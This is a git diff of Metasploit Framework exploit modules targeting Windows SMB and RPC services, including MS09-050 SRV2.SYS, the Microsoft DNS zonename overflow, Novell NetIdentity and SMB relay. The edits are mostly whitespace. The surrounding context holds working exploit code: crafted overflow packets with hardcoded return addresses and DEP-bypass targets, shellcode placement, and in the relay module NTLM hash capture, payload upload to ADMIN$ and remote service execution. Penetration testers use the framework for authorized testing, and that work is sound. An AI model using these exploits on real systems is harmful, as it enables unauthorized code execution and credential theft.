--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Microsoft Server Service Relative Path Stack Corruption',
 'Description' => %q{
- This module exploits a parsing flaw in the path canonicalization code of
+ This module exploits a parsing flaw in the path canonicalization code of
 NetAPI32.dll through the Server Service. This module is capable of bypassing
 NX on some operating systems and service packs. The correct target must be
 used to prevent the Server Service (along with a dozen others in the same
diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb
index 830026546c..6b401a5cc4 100644
--- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb
+++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb
@@ -3,36 +3,34 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::SMB
 include Msf::Exploit::KernelMode
-
+
 def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
 'Description' => %q{
- This module exploits an out of bounds function table dereference in the SMB
- request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
- release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista
- without SP1 does not seem affected by this flaw.
+ This module exploits an out of bounds function table dereference in the SMB
+ request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
+ release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista
+ without SP1 does not seem affected by this flaw.
 },
 'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ],
 'License' => MSF_LICENSE,
 'Version' => '$Revision$',
- 'References' =>
+ 'References' =>
 [
 [ 'MSB', 'MS09-050' ],
 [ 'CVE', '2009-3103' ],
@@ -52,14 +50,14 @@ class Metasploit3 < Msf::Exploit::Remote
 'StackAdjustment' => -3500,
 'DisableNops' => true,
 'EncoderType' => Msf::Encoder::Type::Raw,
- 'ExtendedOptions' =>
+ 'ExtendedOptions' =>
 {
 'Stager' => 'stager_sysenter_hook',
 }
 },
 'Platform' => 'win',
 'Targets' =>
- [
+ [
 [ 'Windows Vista SP1/SP2 and Server 2008 (x86)',
 {
 'Platform' => 'win',
@@ -74,7 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultTarget' => 0
 ))
- register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class )
+ register_options(
+ [
+ Opt::RPORT(445),
+ OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] )
+ ], self.class)
 end
 # Not reliable enough for automation yet
@@ -86,20 +88,20 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." )
 connect
- # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest
+ # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest
 # and srv2!SrvProcPartialCompleteCompoundedRequest
 dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ]
-
+
 data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
 data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's
 data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)
- data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34
+ data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34
 data += [ 0x42424242 ].pack("V") * 7 # Unused
 data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)
 data += [ 0x41414141 ].pack("V") * 6 # Unused
 data += [ target.ret ].pack("V") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2
 data += payload.encoded # Our ring0 -> ring3 shellcode
-
+
 # We gain code execution by returning into the SMB packet, begining with its header.
 # The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX"
 # This will cause an access violation if executed as we can never set EBX to a valid pointer.
@@ -115,9 +117,9 @@ class Metasploit3 < Msf::Exploit::Remote
 packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...
 packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )
 packet['Payload'].v['Payload'] = data
-
+
 packet = packet.to_s
-
+
 print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
 sock.put( packet )
@@ -134,14 +136,14 @@ class Metasploit3 < Msf::Exploit::Remote
 sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))
 rescue ::Exception => e
 sec.socket.close
- end
+ end
 end
 while( stime + wtime > Time.now.to_i )
 select(nil, nil, nil, 0.25)
 break if session_created?
 end
-
+
 handler
 disconnect
 end
diff --git a/modules/exploits/windows/smb/msdns_zonename.rb b/modules/exploits/windows/smb/msdns_zonename.rb
index a34a89c645..f2c3651124 100644
--- a/modules/exploits/windows/smb/msdns_zonename.rb
+++ b/modules/exploits/windows/smb/msdns_zonename.rb
@@ -3,16 +3,14 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking
@@ -20,21 +18,20 @@ class Metasploit3 < Msf::Exploit::Remote
 include Msf::Exploit::Remote::SMB
 def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
 'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)',
 'Description' => %q{
- This module exploits a stack overflow in the RPC interface
- of the Microsoft DNS service. The vulnerability is triggered
- when a long zone name parameter is supplied that contains
- escaped octal strings. This module is capable of bypassing NX/DEP
- protection on Windows 2003 SP1/SP2. This module exploits the
- RPC service using the \\DNSSERVER pipe available via SMB. This
- pipe requires a valid user account to access, so the SMBUSER
- and SMBPASS options must be specified.
-
+ This module exploits a stack overflow in the RPC interface
+ of the Microsoft DNS service. The vulnerability is triggered
+ when a long zone name parameter is supplied that contains
+ escaped octal strings. This module is capable of bypassing NX/DEP
+ protection on Windows 2003 SP1/SP2. This module exploits the
+ RPC service using the \\DNSSERVER pipe available via SMB. This
+ pipe requires a valid user account to access, so the SMBUSER
+ and SMBPASS options must be specified.
 },
- 'Author' =>
- [
+ 'Author' =>
+ [
 'hdm', # initial module
 'anonymous' # 2 anonymous contributors (2003 support)
 ],
@@ -51,19 +48,19 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'thread'
- },
+ },
 'Payload' =>
 {
 'Space' => 500,
-
+
 # The payload doesn't matter, but make_nops() uses these too
 'BadChars' => "\x00",
-
+
 'StackAdjustment' => -3500,
 },
 'Platform' => 'win',
- 'Targets' =>
+ 'Targets' =>
 [
 [ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
@@ -76,18 +73,18 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
 [ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
-
+
 # ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
 [ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
 [ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
- [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
+ [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
 [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
 [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
-
+
 ],
 'DisclosureDate' => 'Apr 12 2007',
 'DefaultTarget' => 0
 ))
-
+
 register_options(
 [
 OptString.new('Locale', [ true, "Locale for automatic target (English, French, Italian, ...)", 'English'])
@@ -101,12 +98,12 @@ class Metasploit3 < Msf::Exploit::Remote
 if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/))
 return target
 end
- end
-
+ end
+
 return nil
 end
-
+
 def exploit
 connect()
@@ -120,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
 target = nil
 when 'Windows 5.0'
- print_status("Detected a Windows 2000 SP0-SP4 target...")
+ print_status("Detected a Windows 2000 SP0-SP4 target...")
 target = gettarget('2000')
 when 'Windows 5.1'
@@ -128,11 +125,11 @@ class Metasploit3 < Msf::Exploit::Remote
 target = nil
 when /Windows Server 2003 (\d+)$/
- print_status("Detected a Windows 2003 SP0 target...")
+ print_status("Detected a Windows 2003 SP0 target...")
 target = gettarget('2003SP0')
 when /Windows Server 2003 (\d+) Service Pack (\d+)/
- print_status("Detected a Windows 2003 SP#{$2} target...")
+ print_status("Detected a Windows 2003 SP#{$2} target...")
 target = gettarget('2003SP12')
 else
 print_status("Unknown OS: #{smb_peer_os}")
@@ -143,10 +140,10 @@ class Metasploit3 < Msf::Exploit::Remote
 if (not target)
 print_status("There is no available target for this OS locale")
 return
- end
-
+ end
+
 print_status("Trying target #{target.name}...")
-
+
 # Bind to the service
 handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_np', ['\dnsserver'])
 print_status("Binding to #{handle} ...")
@@ -158,11 +155,11 @@ class Metasploit3 < Msf::Exploit::Remote
 if (target['OS'] =~ /2000/)
 txt[0, payload.encoded.length] = payload.encoded
-
+
 off = target['Off']
 txt[ off ] = [target.ret].pack('V')
 txt[ off - 4, 2] = "\xeb\x06"
- txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
+ txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
 elsif (target['OS'] =~ /2003SP0/)
 txt[0, payload.encoded.length] = payload.encoded
@@ -191,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # 0x77f443d6 retn ; ret
 txt[ off + 16, 4] = [target['Rets'][2]].pack('V')
 # jmp esp
- txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')
+ txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')
 elsif (target['OS'] =~ /2003SP12/)
 off = target['Off']
@@ -246,21 +243,21 @@ class Metasploit3 < Msf::Exploit::Remote txt.unpack('C*').each do |c| req << "\\" req << c.to_s(8) - end + end # Build the RPC stub data stubdata = NDR.long(rand(0xffffffff)) + NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") + - + NDR.long(rand(0xffffffff)) + NDR.string(req + "\x00") + - + NDR.long(rand(0xffffffff)) + NDR.string(Rex::Text.rand_text_alpha(1) + "\x00") - + print_status('Sending exploit...') - + begin response = dcerpc.call(1, stubdata) @@ -270,7 +267,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Exception => e print_status("Error: #{e}") end - + handler disconnect end diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index 83a3288c17..9abfef3049 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -16,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow.', 'Description' => %q{ - This module exploits a stack overflow in Novell's NetIdentity Agent. When sending + This module exploits a stack overflow in Novell's NetIdentity Agent. When sending a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be able to execute arbitrary code. The success of this module is much greater once the service has been restarted. 
@@ -51,11 +55,11 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Apr 6 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit']), - OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit']) - ], self.class ) + register_options( + [ + OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit']), + OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit']) + ], self.class ) end def mem_leak @@ -134,24 +138,24 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...") - begin - smb_login() - rescue ::Exception => e - print_error("Error: #{e}") - disconnect - return - end + begin + smb_login() + rescue ::Exception => e + print_error("Error: #{e}") + disconnect + return + end - print_status("Connecting to named pipe \\XTIERRPCPIPE...") + print_status("Connecting to named pipe \\XTIERRPCPIPE...") - # If the pipe doesn't exist, bail. - begin - pipe = simple.create_pipe('\\XTIERRPCPIPE') - rescue ::Exception => e - print_error("Error: #{e}") - disconnect - return - end + # If the pipe doesn't exist, bail. + begin + pipe = simple.create_pipe('\\XTIERRPCPIPE') + rescue ::Exception => e + print_error("Error: #{e}") + disconnect + return + end # ok, set up and send our exploit buffer... fid = pipe.file_id @@ -163,4 +167,3 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end end - diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 213615dcca..8e838f4ec7 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,7 +19,7 @@ under: Local Security Settings > Local Policies > Security Options > - Network Access: Sharing and security model for local accounts + Network Access: Sharing and security model for local accounts =end require 'msf/core' 
@@ -29,41 +29,40 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMBServer - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Windows SMB Relay Code Execution', 'Description' => %q{ - This module will relay SMB authentication requests to another - host, gaining access to an authenticated SMB session if successful. - If the connecting user is an administrator and network logins are - allowed to the target machine, this module will execute an arbitrary - payload. To exploit this, the target system must try to authenticate - to this module. The easiest way to force a SMB authentication attempt - is by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or - email message. When the victim views the web page or email, their - system will automatically connect to the server specified in the UNC - share (the IP address of the system running this module) and attempt - to authenticate. Unfortunately, this - module is not able to clean up after itself. The service and payload - file listed in the output will need to be manually removed after access - has been gained. The service created by this tool uses a randomly chosen - name and description, so the services list can become cluttered after - repeated exploitation. + This module will relay SMB authentication requests to another + host, gaining access to an authenticated SMB session if successful. + If the connecting user is an administrator and network logins are + allowed to the target machine, this module will execute an arbitrary + payload. To exploit this, the target system must try to authenticate + to this module. The easiest way to force a SMB authentication attempt + is by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or + email message. 
When the victim views the web page or email, their + system will automatically connect to the server specified in the UNC + share (the IP address of the system running this module) and attempt + to authenticate. Unfortunately, this + module is not able to clean up after itself. The service and payload + file listed in the output will need to be manually removed after access + has been gained. The service created by this tool uses a randomly chosen + name and description, so the services list can become cluttered after + repeated exploitation. - The SMB authentication relay attack was first reported by Sir Dystic on - March 31st, 2001 at @lanta.con in Atlanta, Georgia. - - On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin - includes a patch which prevents the relaying of challenge keys back to - the host which issued them, preventing this exploit from working in - the default configuration. It is still possible to set the SMBHOST - parameter to a third-party host that the victim is authorized to access, - but the "reflection" attack has been effectively broken. - + The SMB authentication relay attack was first reported by Sir Dystic on + March 31st, 2001 at @lanta.con in Atlanta, Georgia. + + On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin + includes a patch which prevents the relaying of challenge keys back to + the host which issued them, preventing this exploit from working in + the default configuration. It is still possible to set the SMBHOST + parameter to a third-party host that the victim is authorized to access, + but the "reflection" attack has been effectively broken. }, - 'Author' => - [ + 'Author' => + [ 'hdm' ], 'License' => MSF_LICENSE, @@ -72,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread' - }, + }, 'Payload' => { 'Space' => 2048, 
@@ -86,26 +85,26 @@ class Metasploit3 < Msf::Exploit::Remote [ 'MSB', 'MS08-068'], [ 'URL', 'http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx'], [ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ], - [ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ], + [ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ], [ 'URL', 'http://www.xfocus.net/articles/200305/smbrelay.html' ] - ], + ], 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DisclosureDate' => 'Mar 31 2001', 'DefaultTarget' => 0 )) - - register_options( - [ - OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]) - ], self.class ) + + register_options( + [ + OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]) + ], self.class ) end if (not const_defined?('NDR')) - NDR = Rex::Encoder::NDR + NDR = Rex::Encoder::NDR end def smb_haxor(c) @@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Ignoring request from #{smb[:rhost]}, attack already in progress.") return end - + if (not rclient.client.auth_user) print_line(" ") print_error( @@ -128,15 +127,15 @@ class Metasploit3 < Msf::Exploit::Remote print_line(" ") return end - + print_status("Connecting to the ADMIN$ share...") rclient.connect("ADMIN$") - + @pwned[smb[:rhost]] = true - + print_status("Regenerating the payload...") code = regenerate_payload(smb[:rsock]) - + # Upload the shellcode to a file print_status("Uploading payload...") filename = rand_text_alpha(8) + ".exe" 
@@ -144,19 +143,19 @@ class Metasploit3 < Msf::Exploit::Remote fd << Msf::Util::EXE.to_win32pe_service(framework,code.encoded,rand_text_alpha(8)) fd.close print_status("Created \\#(unknown)...") - + # Disconnect from the ADMIN$ rclient.disconnect("ADMIN$") - + print_status("Connecting to the Service Control Manager...") rclient.connect("IPC$") dcerpc = smb_dcerpc(c, '367abb81-9844-35f1-ad32-98f038001003', '2.0', "\\svcctl") ## - # OpenSCManagerW() + # OpenSCManagerW() ## - + print_status("Obtaining a service manager handle...") scm_handle = nil stubdata = @@ -172,34 +171,34 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - + ## # CreateServiceW() ## - + servicename = rand_text_alpha(8) displayname = rand_text_alpha(rand(32)+1) svc_handle = nil svc_status = nil - + print_status("Creating a new service...") stubdata = scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - + NDR.long(0x0F01FF) + # Access: MAX NDR.long(0x00000110) + # Type: Interactive, Own process NDR.long(0x00000003) + # Start: Demand NDR.long(0x00000000) + # Errors: Ignore - + NDR.wstring("%SYSTEMROOT%\\#(unknown)") + # Binary Path NDR.long(0) + # LoadOrderGroup NDR.long(0) + # Dependencies NDR.long(0) + # Service Start NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password NDR.long(0) # Password begin response = dcerpc.call(0x0c, stubdata) @@ -211,7 +210,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - + ## # CloseHandle() @@ -228,10 +227,10 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Opening service...") begin stubdata = - scm_handle + + scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - + response = dcerpc.call(0x10, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) svc_handle = dcerpc.last_response.stub_data[0,20] 
@@ -240,15 +239,15 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - + ## # StartService() ## print_status("Starting the service...") stubdata = svc_handle + - NDR.long(0) + - NDR.long(0) + NDR.long(0) + + NDR.long(0) begin response = dcerpc.call(0x13, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) @@ -263,14 +262,14 @@ class Metasploit3 < Msf::Exploit::Remote ## print_status("Removing the service...") stubdata = - svc_handle + svc_handle begin response = dcerpc.call(0x02, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) end rescue ::Exception => e print_status("Error: #{e}") - end + end ## # CloseHandle() @@ -281,41 +280,41 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Exception => e print_status("Error: #{e}") end - + rclient.disconnect("IPC$") print_status("Deleting \\#(unknown)...") rclient.connect("ADMIN$") rclient.delete("\\#(unknown)") end - - + + def smb_dcerpc(c, uuid, version, pipe) smb = @state[c] opts = { - 'Msf' => framework, + 'Msf' => framework, 'MsfExploit' => self, 'smb_pipeio' => 'rw', 'smb_client' => smb[:rclient] } - + handle = Rex::Proto::DCERPC::Handle.new([uuid, version], 'ncacn_np', smb[:ip], [pipe]) dcerpc = Rex::Proto::DCERPC::Client.new(handle, smb[:rsock], opts) end - + def smb_cmd_dispatch(cmd, c, buff) smb = @state[c] - + @pwned ||= {} - + case cmd when CONST::SMB_COM_NEGOTIATE smb_cmd_negotiate(c, buff) when CONST::SMB_COM_SESSION_SETUP_ANDX smb_cmd_session_setup(c, buff) - + when CONST::SMB_COM_TREE_CONNECT print_status("Denying tree connect from #{smb[:name]}") pkt = CONST::SMB_BASE_PKT.make_struct 
@@ -324,34 +323,34 @@ class Metasploit3 < Msf::Exploit::Remote pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000022 c.put(pkt.to_s) - - else + + else print_status("Ignoring request from #{smb[:name]} (#{cmd})") pkt = CONST::SMB_BASE_PKT.make_struct pkt['Payload']['SMB'].v['Command'] = cmd pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0 # 0xc0000022 - c.put(pkt.to_s) + c.put(pkt.to_s) end - end + end def smb_cmd_negotiate(c, buff) smb = @state[c] pkt = CONST::SMB_NEG_PKT.make_struct pkt.from_s(buff) - + # Record the remote process ID smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID'] group = '' machine = smb[:nbsrc] - + dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/) # print_status("Negotiation from #{smb[:name]}: #{dialects.join(", ")}") - - dialect = - dialects.index("NT LM 0.12") || + + dialect = + dialects.index("NT LM 0.12") || dialects.length-1 @@ -383,14 +382,14 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Error connecting to #{target_host}:#{rport} #{e.class} #{e}") end end - + if(not rsock) print_error("Could not connect to the target host (#{target_host}), the target may be firewalled.") return end - + rclient = Rex::Proto::SMB::SimpleClient.new(rsock, rport == 445 ? true : false) - + begin rclient.login_split_start_ntlm1(smb[:nbsrc]) rescue ::Interrupt 
@@ -399,24 +398,24 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Could not negotiate NTLMv1 with #{target_host}:#{rport} #{e.class} #{e}") raise e end - + if (not rclient.client.challenge_key) print_error("No challenge key received from #{smb[:ip]}:#{rport}") rsock.close return end - + if (smb[:rsock]) - smb[:rsock].close + smb[:rsock].close end - + smb[:rsock] = rsock smb[:rclient] = rclient smb[:rhost] = target_host pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct smb_set_defaults(c, pkt) - + time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE 
@@ -426,57 +425,57 @@ class Metasploit3 < Msf::Exploit::Remote pkt['Payload'].v['Dialect'] = dialect pkt['Payload'].v['SecurityMode'] = 3 pkt['Payload'].v['MaxMPX'] = 2 - pkt['Payload'].v['MaxVCS'] = 1 + pkt['Payload'].v['MaxVCS'] = 1 pkt['Payload'].v['MaxBuff'] = 4356 pkt['Payload'].v['MaxRaw'] = 65536 pkt['Payload'].v['Capabilities'] = 0xe3fd # 0x80000000 for extended pkt['Payload'].v['ServerTime'] = time_lo pkt['Payload'].v['ServerDate'] = time_hi pkt['Payload'].v['Timezone'] = 0x0 - - + + pkt['Payload'].v['SessionKey'] = 0 pkt['Payload'].v['KeyLength'] = 8 - - pkt['Payload'].v['Payload'] = - rclient.client.challenge_key + + + pkt['Payload'].v['Payload'] = + rclient.client.challenge_key + Rex::Text.to_unicode(group) + "\x00\x00" + Rex::Text.to_unicode(machine) + "\x00\x00" c.put(pkt.to_s) end - + def smb_cmd_session_setup(c, buff) smb = @state[c] pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct pkt.from_s(buff) - + # Record the remote multiplex ID smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID'] - - lm_len = pkt['Payload'].v['PasswordLenLM'] - nt_len = pkt['Payload'].v['PasswordLenNT'] - + + lm_len = pkt['Payload'].v['PasswordLenLM'] + nt_len = pkt['Payload'].v['PasswordLenNT'] + lm_hash = pkt['Payload'].v['Payload'][0, lm_len].unpack("H*")[0] nt_hash = pkt['Payload'].v['Payload'][lm_len, nt_len].unpack("H*")[0] - - + + buff = pkt['Payload'].v['Payload'] buff.slice!(0, lm_len + nt_len) names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') } - + smb[:username] = names[0] smb[:domain] = names[1] smb[:peer_os] = names[2] smb[:peer_lm] = names[3] - - + + # Clean up the data for loggging if (smb[:username] == "") smb[:username] = nil end - + if (smb[:domain] == "") smb[:domain] = nil end @@ -486,7 +485,7 @@ class Metasploit3 < Msf::Exploit::Remote "LMHASH:#{lm_hash ? lm_hash : "<NULL>"} NTHASH:#{nt_hash ? nt_hash : "<NULL>"} " + "OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}" ) - + if (lm_hash == "" or lm_hash == "00") lm_hash = nil end 
@@ -494,16 +493,16 @@ class Metasploit3 < Msf::Exploit::Remote if (nt_hash == "") nt_hash = nil end - + if (lm_hash or nt_hash) rclient = smb[:rclient] print_status("Authenticating to #{smb[:rhost]} as #{smb[:domain]}\\#{smb[:username]}...") res = nil - + begin res = rclient.login_split_next_ntlm1( - smb[:username], - smb[:domain], + smb[:username], + smb[:domain], [ (lm_hash ? lm_hash : "00" * 24) ].pack("H*"), [ (nt_hash ? nt_hash : "00" * 24) ].pack("H*") ) @@ -517,9 +516,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Failed to authenticate as #{smb[:domain]}\\#{smb[:username]}...") end end - + print_status("Sending Access Denied to #{smb[:name]} #{smb[:domain]}\\#{smb[:username]}") - + pkt = CONST::SMB_BASE_PKT.make_struct smb_set_defaults(c, pkt) @@ -527,7 +526,7 @@ class Metasploit3 < Msf::Exploit::Remote pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000022 - c.put(pkt.to_s) + c.put(pkt.to_s) end end diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index e1ea143cf4..c50a258d88 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
